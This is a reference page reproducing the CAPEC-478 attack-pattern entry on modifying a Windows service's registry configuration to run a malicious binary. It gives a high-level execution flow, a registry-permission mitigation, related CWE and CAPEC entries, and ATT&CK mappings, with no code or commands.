CAPEC-478 Modification of Windows Service Configuration

CAPEC-478 Metadata

Likelihood of Attack

Low

Typical Severity

High

Overview

Summary

An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. The goal of this attack is to execute a malicious binary in place of an existing service.

Prerequisites

The adversary must have the capability to write to the Windows Registry on the targeted system.

Execution Flow

Step	Phase	Description	Techniques
1	Explore	[Determine target system] The adversary must first determine the system they wish to modify the registry of. This needs to be a windows machine as this attack only works on the windows registry.
2	Experiment	[Gain access to the system] The adversary needs to gain access to the system in some way so that they can modify the windows registry.	Gain physical access to a system either through shoulder surfing a password or accessing a system that is left unlocked. Gain remote access to a system through a variety of means.
3	Exploit	[Modify windows registry] The adversary will modify the windows registry by changing the configuration settings for a service. Specifically, the adversary will change the path settings to define a path to a malicious binary to be executed.

Potential Solutions / Mitigations

Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

Related Weaknesses (CWE)

CWE ID	Description
CWE-284	Improper Access Control

Related CAPECs

CAPEC ID	Description
CAPEC-203	An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.

CAPEC ID

Description

CAPEC-203

An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.

Taxonomy Mappings

Taxonomy: ATTACK

Entry ID	Entry Name
1574.011	Hijack Execution Flow:Service Registry Permissions Weakness
1543.003	Create or Modify System Process:Windows Service

Stay Ahead of Attack Patterns

Understanding CAPEC patterns helps security professionals anticipate and thwart potential attacks. Leverage these insights to enhance threat modeling, strengthen your software development lifecycle, and train your security teams effectively.